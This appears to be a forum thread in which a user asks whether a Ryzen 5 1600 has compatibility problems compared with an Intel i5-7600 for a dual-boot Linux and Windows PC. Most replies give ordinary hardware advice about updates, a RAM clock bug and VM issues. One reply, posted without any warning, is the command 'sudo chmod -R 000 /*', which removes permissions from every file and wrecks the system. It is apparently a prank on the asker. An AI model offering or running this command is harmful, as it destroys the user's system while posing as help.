Background: I didn't know the full true benefit of using Ryzen until yesterday, so bear with me:

Question: I am planning on building a PC rig dual booting with Linux and Windows using a EVGA Nvidia 1060 6gb card with 2x4 ram running at 3000 mHz. Are there any compatibility issues I should be aware of when using the Ryzen 5 1600, compared to Intel i5-7600?

No, it should work just fine out of the box. In fact, Linux shipped with proper ryzen support even before windows. Just make sure everything is up to date.

The only problem you might have is with the ram - there's a known bug in the platform that prevents memory from running above a certain frequency, it should get fixed soon (maybe it already is, can't remember) but if you do have problems try lowering the memory clock.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

As long as you aint doing any VMs yet ryzen will br fine, there is some issues with that which are being resolved, but haven't been yet. Give them time though. Part from that dual booting should work fine and I doubt there will be issues with RAM as long as you use the correct BIOS
